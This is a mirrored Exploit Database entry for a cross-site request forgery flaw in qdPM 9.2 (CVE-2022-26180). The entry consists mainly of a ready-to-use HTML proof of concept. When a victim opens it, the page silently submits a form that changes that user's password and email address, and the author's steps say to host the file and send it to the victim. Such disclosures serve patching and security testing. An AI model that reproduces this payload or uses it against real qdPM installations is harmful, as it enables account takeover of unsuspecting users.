qdPM 9.2 – Cross-site Request Forgery (CSRF)

• Exploit Database
• 17 阅读

• 作者： Chetanya Sharma
  日期： 2022-04-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50854/

• # Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
  # Google Dork: NA
  # Date: 03/27/2022
  # Exploit Author: Chetanya Sharma @AggressiveUser
  # Vendor Homepage: https://qdpm.net/
  # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
  # Version: 9.2
  # Tested on: KALI OS
  # CVE : CVE-2022-26180
  #
  ---------------
  
  Steps to Exploit : 
  	1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
  	2) send it to victim.
  
  <html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
  <input type="hidden" name="sf&#95;method" value="put" />
  <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
  <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
  <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
  <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
  <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
  <input type="hidden" name="users&#91;photo&#93;" value="" />
  <input type="hidden" name="users&#91;culture&#93;" value="en" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>